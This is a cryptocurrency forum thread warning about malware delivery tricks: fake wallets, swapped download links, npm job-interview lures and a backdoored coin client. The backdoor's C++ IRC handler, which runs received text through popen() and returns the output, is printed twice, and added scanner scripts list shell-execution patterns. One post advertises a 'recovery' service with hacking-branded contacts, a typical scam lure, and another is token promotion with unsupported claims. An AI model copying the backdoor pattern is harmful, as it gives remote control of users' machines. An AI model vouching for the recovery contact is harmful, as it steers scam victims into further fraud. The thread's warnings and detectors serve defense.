Topic: Beware of Increasingly Sophisticated Malware Infection Attempts (Read 858475 times)

newbie
Activity: 6
Merit: 0
Malware infections are very detrimental to all of us, and I have experienced something like that. This is what makes me quite careful about entering sites that are not clear.
newbie
Activity: 1
Merit: 0
Recovering funds lost to cryptocurrency scams can be a daunting process, but there are legitimate options available if you approach the situation carefully. Here’s a comprehensive guide on the most effective ways to recover your funds, along with information about legitimate recovery options:
1. Contact a Trusted Recovery Company: Swift Spy Assets Recovery is a reputable firm known for successfully retrieving stolen cryptocurrency. They use advanced tools and expertise to track and recover lost funds.
2. Gather Evidence: Collect all relevant documents and details about the scam, including transaction records and communications.
3. File Reports: Report the scam to local authorities and organizations like the Internet Crime Complaint Center (IC3).
4. Consult a Tax Professional: Be aware of potential tax implications from recovered funds. Document everything and seek professional advice for proper tax reporting.

By choosing a reputable recovery company like Swift Spy Assets Recovery and following these steps, you can improve your chances of recovering lost funds while managing any associated tax implications effectively. For more information on reaching out to Swift Spy Assets Recovery Email Swiftrecoveryservice006 @ gmail.com Or Telegram SWIFT HACKING
newbie
Activity: 24
Merit: 0
On LinkedIn and Upwork I've received a number of contacts saying they would like to hire me for a few different reasons. One was for finding some problems with their Web3 site, another for adding features, another to change blockchains, others for similar reasons. They would point to a GitHub account which invariably included some React-based Node project and asked me to look at what exists and then schedule a call to talk.

The scam here is that they expect you to run some random npm package on a Windows box. This would search your machine for any wallet software, upload it elsewhere, and then install any other files from an offsite host. I'm not sure if any Windows firewall or AV would catch the issue. The nasty code has been hiding in jquery-min.js and similar; deobfuscating the code shows a long list of potential wallet file locations to grab and the IP addresses of where to upload and also download further files.

I have no idea of the effectiveness of this approach, as any real dev shouldn't run unknown software on a local machine. However, the JavaScript was 500 lines of rather interesting code, so there was some work put into the scam.




Thank you for sharing this. It's a crucial reminder to stay vigilant, especially in the Web3 space where scams can be sophisticated. Running any unknown npm packages, especially from unverified sources, is risky and can lead to severe security breaches. It's always best to use a sandbox or a virtual environment to test unknown code and thoroughly inspect it before running it on your machine. It's sad to see so much effort put into scams rather than building something constructive, but awareness like this can help others avoid falling victim. Stay safe!
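The lure quoted above only works if the target runs the repository. As an added example (not code from the post or from any real package), the Python script below triages a checked-out npm project before anything is installed: it lists the lifecycle scripts npm would execute on its own and flags JavaScript files carrying indicators typical of droppers. The repository layout and contents in SAMPLE_FILES are constructed; the indicator list is a heuristic starting point, not a detection signature.

```python
"""Pre-install triage of an npm repository: lifecycle hooks plus dropper indicators.
Added example, not code from the post or any real package; SAMPLE_FILES is constructed."""
import json
import math
import os
import re
import string
from collections import Counter

# Hooks npm runs on its own during install; droppers are usually wired into one.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristic indicators: a hit is a reason to read the file, not proof of malice.
PATTERNS = {
    "child_process": re.compile(r"""require\(\s*["']child_process["']\s*\)"""),
    "eval": re.compile(r"\beval\s*\("),
    "function_ctor": re.compile(r"\bnew\s+Function\s*\("),
    "escape_run": re.compile(r"(?:\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}){8,}"),
    "http_client": re.compile(r"""require\(\s*["']https?["']\s*\)"""),
}
# String literals of 200+ characters: candidate packed payloads or embedded config.
LONG_STRING = re.compile(r'"((?:[^"\\]|\\.){200,})"|\'((?:[^\'\\]|\\.){200,})\'')

def shannon_entropy(text):
    """Bits per character; encoded or packed data sits well above plain JS."""
    counts, n = Counter(text), len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def scan_js(text):
    """Return {indicator: count} for one JS file; empty dict means nothing flagged."""
    hits = {name: len(rx.findall(text)) for name, rx in PATTERNS.items() if rx.search(text)}
    blobs = [a or b for a, b in LONG_STRING.findall(text)]
    noisy = sum(1 for b in blobs if shannon_entropy(b) > 4.5)
    if noisy:
        hits["high_entropy_blobs"] = noisy
    return hits

def triage_package(files):
    """files maps relative path -> content; returns the triage report."""
    report = {"lifecycle_scripts": {}, "suspicious_files": {}}
    if "package.json" in files:
        scripts = json.loads(files["package.json"]).get("scripts", {})
        report["lifecycle_scripts"] = {k: v for k, v in scripts.items() if k in LIFECYCLE}
    for path, text in files.items():
        if path.endswith(".js"):
            hits = scan_js(text)
            if hits:
                report["suspicious_files"][path] = hits
    return report

def triage_dir(root):
    """Read a checked-out repository from disk, vendored files included, and triage it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name == "package.json" or name.endswith(".js"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    files[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
    return triage_package(files)

# Constructed sample: a React repo whose "vendored jQuery" is nothing of the sort.
_ALPHABET = string.ascii_letters + string.digits + "+/"
_BLOB = "".join(_ALPHABET[(i * 37) % 64] for i in range(300))  # base64-looking junk
SAMPLE_FILES = {
    "package.json": json.dumps({"name": "web3-dashboard", "scripts": {
        "start": "react-scripts start", "postinstall": "node ./vendor/jquery-min.js"}}),
    "src/App.js": "import React from 'react';\nexport default function App() { return null; }\n",
    "vendor/jquery-min.js": "/*! jQuery v3.6.0 */\nvar cp = require('child_process');\n"
    + 'var k = "' + _BLOB + '";\nvar p = "' + "\\x41" * 12 + '";\neval(p);\n',
}

if __name__ == "__main__":
    print(json.dumps(triage_package(SAMPLE_FILES), indent=2))
```

Run triage_dir() on the cloned repository from a throwaway VM; a postinstall hook pointing at a "minified library" with child_process and eval is the pattern the quoted post describes and is reason enough to stop there.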
newbie
Activity: 24
Merit: 0
Don't download and run unknown files... use VirusTotal or any.run to check "unpopular" applications.

Don't sign transactions or connect Web3 wallets such as MetaMask, Trust Wallet etc. to unknown websites.

Do your due diligence: double check URLs, cross check from here or social media. Even when Discords or Twitter accounts make announcements, wait and cross check; sometimes even those platforms get hacked and people use them to make announcements with fraudulent or malicious links that steal your funds.

Basically, always think before you make a move with your crypto.

Again, as many users said, if you have large funds it's best to keep them on a separate device that's not used for daily internet activities such as gaming, downloading, social media etc.

Great advice! It's essential to stay vigilant in the crypto space. Always double-check URLs, verify announcements, and avoid connecting wallets to unknown sites. Protecting your funds should always be the top priority—using tools like VirusTotal or any.run and keeping large funds on a separate, secure device are smart steps. Thanks for sharing these tips!
newbie
Activity: 24
Merit: 0
Yes, the points you mentioned are very technical and clear, but the last one is the key to the door of a safe trading era. You have to keep a device for daily activities that has no link with your trading device; there are a number of reasons for it.

Nowadays scamming has increased so much and the techniques are so efficient that if you use a PC or mobile, it surely will be subjected to some malware. It has become almost impossible to avoid such kind of activities; although anti-malware companies are developing software, they're not meeting the requirements. So the best way to keep yourself safe is to keep a separate mobile for crypto use and don't download unnecessary files and software.

Thanks for your input! You're absolutely right—keeping a separate device for crypto trading is a smart move, especially with the rise in sophisticated scams and malware. It’s unfortunate that even the best anti-malware solutions can't always keep up with new threats. By using a dedicated device, you minimize the risk and protect your assets more effectively. Staying cautious and avoiding unnecessary downloads is essential in this digital age. Safety first!
sr. member
Activity: 309
Merit: 290
On LinkedIn and Upwork I've received a number of contacts saying they would like to hire me for a few different reasons. One was for finding some problems with their Web3 site, another for adding features, another to change blockchains, others for similar reasons. They would point to a GitHub account which invariably included some React-based Node project and asked me to look at what exists and then schedule a call to talk.

The scam here is that they expect you to run some random npm package on a Windows box. This would search your machine for any wallet software, upload it elsewhere, and then install any other files from an offsite host. I'm not sure if any Windows firewall or AV would catch the issue. The nasty code has been hiding in jquery-min.js and similar; deobfuscating the code shows a long list of potential wallet file locations to grab and the IP addresses of where to upload and also download further files.

I have no idea of the effectiveness of this approach, as any real dev shouldn't run unknown software on a local machine. However, the JavaScript was 500 lines of rather interesting code, so there was some work put into the scam.


full member
Activity: 280
Merit: 110
Eloncoin.org - Mars, here we come!
Yes, the points you mentioned are very technical and clear, but the last one is the key to the door of a safe trading era. You have to keep a device for daily activities that has no link with your trading device; there are a number of reasons for it.

Nowadays scamming has increased so much and the techniques are so efficient that if you use a PC or mobile, it surely will be subjected to some malware. It has become almost impossible to avoid such kind of activities; although anti-malware companies are developing software, they're not meeting the requirements. So the best way to keep yourself safe is to keep a separate mobile for crypto use and don't download unnecessary files and software.
newbie
Activity: 50
Merit: 0
My friend's account got swiped by a keyboard malware virus, just because he copied and pasted. These scams aren't funny.
hero member
Activity: 1022
Merit: 600
I was intrigued by a scam which consists of revealing a wallet's mnemonic phrase on a forum, on Twitter or elsewhere.
So I installed one of these wallets, which indeed has funds. I observed what was happening and asked for explanations (from a bitcointalker): there are ERC-20 tokens in the wallet, for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees, which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
Yes, you said the truth; almost the same experience as mine. Those guys are very smart and are on standby, ready to move any funds in the wallet they got access to the moment they get a victim, but I can't really say if they are using a robot to run that shit. Even recently I have been receiving phishing links via email; I don't take time to delete them when I see any of those links.
copper member
Activity: 99
Merit: 3
Instant & Cross Chain Crypto Swaps
Don't download and run unknown files... use VirusTotal or any.run to check "unpopular" applications.

Don't sign transactions or connect Web3 wallets such as MetaMask, Trust Wallet etc. to unknown websites.

Do your due diligence: double check URLs, cross check from here or social media. Even when Discords or Twitter accounts make announcements, wait and cross check; sometimes even those platforms get hacked and people use them to make announcements with fraudulent or malicious links that steal your funds.

Basically, always think before you make a move with your crypto.

Again, as many users said, if you have large funds it's best to keep them on a separate device that's not used for daily internet activities such as gaming, downloading, social media etc.
newbie
Activity: 210
Merit: 0
The usual Windows Defender helps me a lot.
The main thing is not to download dubious files.
jr. member
Activity: 53
Merit: 2
This one is actually pretty old, a couple years I'd say. Now it's more a meme than anything else. The malicious wallet signatures were and still are a pretty dangerous thing.

I was intrigued by a scam which consists of revealing a wallet's mnemonic phrase on a forum, on Twitter or elsewhere.
So I installed one of these wallets, which indeed has funds. I observed what was happening and asked for explanations (from a bitcointalker): there are ERC-20 tokens in the wallet, for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees, which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
hero member
Activity: 1820
Merit: 775
I was intrigued by a scam which consists of revealing a wallet's mnemonic phrase on a forum, on Twitter or elsewhere.
So I installed one of these wallets, which indeed has funds. I observed what was happening and asked for explanations (from a bitcointalker): there are ERC-20 tokens in the wallet, for example, but to transfer them you need fees. The people who install this fraudulent wallet send the fees, which are instantly scanned and sent to another wallet. This is really very clever.
I would like to understand better how it works. From what I understood, the scammers use some kind of robot to instantly send the fees elsewhere.
copper member
Activity: 99
Merit: 3
Instant & Cross Chain Crypto Swaps
Common things to watch are obviously files; these can come from GitHub, YouTube video description links, Gmail/email attachments and especially torrents, bound with malware and/or stealers. Honestly, I'd recommend keeping wallets separate from any computer you use for downloads, surfing etc. Also, with NFTs/DeFi be careful to make sure what you're signing with your wallet, as it can be drained. Furthermore, never interact with NFTs/coins that just show up or were airdropped into your wallet; as another member stated, interacting with unknown "malicious" smart contracts can end up in a total transfer of your funds. STAY SAFE OUT THERE FOLKS!
hero member
Activity: 1190
Merit: 543
fillippone - Winner contest Pizza 2022
There are other ways accounts get hacked: there are some fake projects online that request logins just to get in touch with what someone's password looks like; hackers then try these passwords on other accounts of the victims, like their Gmail and blockchain accounts. This also makes accounts vulnerable to attacks.
Things are getting sophisticated these days in the ways scammers use to steal from different accounts and wallets. They can even clone a website like the big websites we have with huge numbers of customers, making it look alike, and then drop the link to their cloned website on the internet and in different DMs so that once you click it and log in to your account, they save the password and have access to the account. We need to look out for the different ways many of these scammers are using to steal from us.
newbie
Activity: 105
Merit: 0
When I intend to send some funds, the address is changed and some characters are omitted. That's why when making transactions I use my phone instead of my PC. Does anyone experience this too? If this is a malware infection, what should I do?
jr. member
Activity: 840
Merit: 6
More and more people are writing on social networks about the fact that there is a lot of malware and viruses on MacBook M1. How can I detect and remove them? I may have such software installed.
I haven't heard of any crypto malware or viruses on the MacBook M1 models. They use different code (not x64) and a different OS (Unix-based), so they should not be able to get 99% of viruses by default. If you know of any I should look out for, do tell. I actually switched to a MacBook to use Candle Chain and Polygon DApps on MetaMask and have had 0 hacks. I also moved my cold storage to a Tangem wallet, which is safer IMO than a Ledger.
sr. member
Activity: 1288
Merit: 231
Hire Bitcointalk Camp. Manager @ r7promotions.com
Wow, in all my time in the crypto space, I never even imagined a virus linked to a coin/token's source code which can actually hijack one's wallet. I should be more careful about the kind of coins I transact these days onward.
newbie
Activity: 14
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins, so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with its source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
// Triggered by an IRC PRIVMSG whose text starts with ":!". CBuff, CLine,
// CRead and CFree are macros defined elsewhere in the modified source.
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The rest of the line, starting at the fifth word, is handed to CRead.
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        // Extract the sender's nick from the ":nick!user@host" prefix.
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the collected output back to the sender.
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// With the macros expanded the intent is plain: popen() runs the rest of the
// line through the system shell and the output is sent back over IRC, so
// anyone who can message the node gets remote command execution on it.
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.




The purpose of this document is to make you understand the problem we are facing now with the growing popularity of the crypto markets. Cryptocurrencies and blockchain are a monstrous topic, and the applications of blockchain technologies came with a total lack of regulation to prevent illegal activities. Since the legal context is missing in Decentralized Finance built on top of blockchain technology, we are forced to witness the rise of DeFi scams.

DeFi rug pulls and exit scams formed 99% of all crypto frauds in 2020. DeFi-related hacks now make up more than 60% of the total hack and theft volume in 2021, a large increase from only 25% in 2020.

Both exit scams and DeFi rug pulls are crypto frauds. Exit scams happen when cryptocurrency promoters disappear with investors' money during or after an initial coin offering (ICO). DeFi rug pulls are a new form of exit scam whereby crypto developers abandon a project and run away with investors' funds.

At the time of writing, between January-April 2021, DeFi scamsters raked in almost $83.4 million. Looking at the broader picture, almost 55% of all major cryptocurrency scams were DeFi hacks. That means out of a total theft amount of $432 million, $240 million can solely be attributed to DeFi. Even sophisticated investors, with a keen eye and understanding of financial details, can fall prey to such scams.




We built a platform for the decentralized finance industry to STOP the explosion of DeFi fraudulent projects that has left many individual investors burned. In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?

Token utility use cases

Simplified trading

In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.


Automatic scoring mechanism

The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.


Rug pull and scam detection

Based on the blockchain enterprise subscription plans, we have access to their professional API endpoints to fetch any smart contract data, including pending transactions, so we can instantly detect any movements of funds. As described in previous chapters, once our detection mechanism detects something it can send notifications to CSD Token holders when specific events trigger the mechanism.



Smart contracts monitoring

Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.


Address monitor

The same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.


Transactions track down

In our early stage, when tests were made as described in the proof of concept chapter, we succeeded without doubt not only in tracking down transactions but also in detecting blockchain shifts and coming back to the original owner, including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.




Blockchain shift detection

As described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.

Behaviour comparison

Starting from the moment when machine learning gets outside of the testing lab stage, as described in the proof of concept chapter, once in the production environment it will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.

User defined instant notifications

At the cost of notification service providers, any CSD Token holder can spend part of their CSD on being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.

Smart contracts whitelisting/blacklisting

Terms such as "blacklist" and "whitelist" were commonly used within cybersecurity and infosec circles to simply designate which person or application can access a system or network (and which ones are denied). Once our scoring mechanism is filled with the qualified, confirmed result against the detected smart contract scam project, it will automatically blacklist it in our data storage and flag it as a highly risky investment, with the option for the contract owner to be whitelisted back once it passes all stages of the validation process, in which the community is also involved.
On top of this validation process, being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cryptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware; based on our team experts together with the CSD community voice and certified experts, we will also provide enterprise-level audits to support newly created projects in getting popular and trusted by the community and potential investors.






More features to come

The Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes to product features are already on the checklist, as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project management costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization's most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.
jr. member
Activity: 41
Merit: 1
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins, so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with its source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
// Triggered by an IRC PRIVMSG whose text starts with ":!". CBuff, CLine,
// CRead and CFree are macros defined elsewhere in the modified source.
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The rest of the line, starting at the fifth word, is handed to CRead.
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        // Extract the sender's nick from the ":nick!user@host" prefix.
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the collected output back to the sender.
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// With the macros expanded the intent is plain: popen() runs the rest of the
// line through the system shell and the output is sent back over IRC, so
// anyone who can message the node gets remote command execution on it.
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.


Good information. However, add some more to make it better. We need more information!
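The backdoor quoted above hides popen() behind the CRead macro, which is exactly what a grep for popen in a reviewed coin source misses. The following is an added example, not code from the post or from the coin's repository: a small Python audit pass that follows #define chains and reports process-spawning calls under their real names. The #define lines in its SAMPLE are assumed (the post shows only the macro form and the expanded form), and the SPAWN_CALLS list is a starting point to extend.

```python
"""Find process-spawning calls hidden behind #define aliases in C/C++ source.
Added example, not code from the post or the coin's repository: a textual pass that
follows macro chains (CRead -> popen) so a disguised popen() is reported by its real
name. It is a heuristic over source text, not a run of the preprocessor."""
import re

# Calls that start a process or hand a string to the system shell.
SPAWN_CALLS = {
    "popen", "_popen", "system", "execl", "execlp", "execle", "execv", "execvp",
    "execve", "posix_spawn", "CreateProcessA", "CreateProcessW", "ShellExecuteA",
    "ShellExecuteW", "WinExec",
}
# '#define NAME target' and function-like '#define NAME(args) target(args)'.
DEFINE_RE = re.compile(r"^\s*#\s*define\s+(\w+)(?:\([^)]*\))?\s+(\w+)\b")
CALL_RE = re.compile(r"\b(\w+)\s*\(")

def collect_aliases(src):
    """Map each macro name to its final target, following chains (A -> B -> popen)."""
    direct = {}
    for line in src.splitlines():
        m = DEFINE_RE.match(line)
        if m:
            direct[m.group(1)] = m.group(2)
    resolved = {}
    for name in direct:
        target, seen = name, set()
        while target in direct and target not in seen:  # guard against cycles
            seen.add(target)
            target = direct[target]
        resolved[name] = target
    return resolved

def find_spawns(src):
    """Return [(line_no, name_as_written, resolved_name)] for every spawn call."""
    aliases = collect_aliases(src)
    findings = []
    for line_no, line in enumerate(src.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # a #define line is not a call site
        for m in CALL_RE.finditer(line):
            name = m.group(1)
            real = aliases.get(name, name)
            if real in SPAWN_CALLS:
                findings.append((line_no, name, real))
    return findings

# Constructed sample modelled on the backdoor quoted in the thread. The #define
# lines are assumed: the post shows only the macro form and the expanded form.
SAMPLE = """\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
    }
}
"""

if __name__ == "__main__":
    for line_no, name, real in find_spawns(SAMPLE):
        alias = "" if name == real else f" (alias of {real})"
        print(f"line {line_no}: {name}(){alias}")
```

Run find_spawns() over every source file of a client you are asked to build; macros defined in a header are only followed when the header text is concatenated with the file, so for a full picture also diff the preprocessed output (gcc -E) against the unexpanded source.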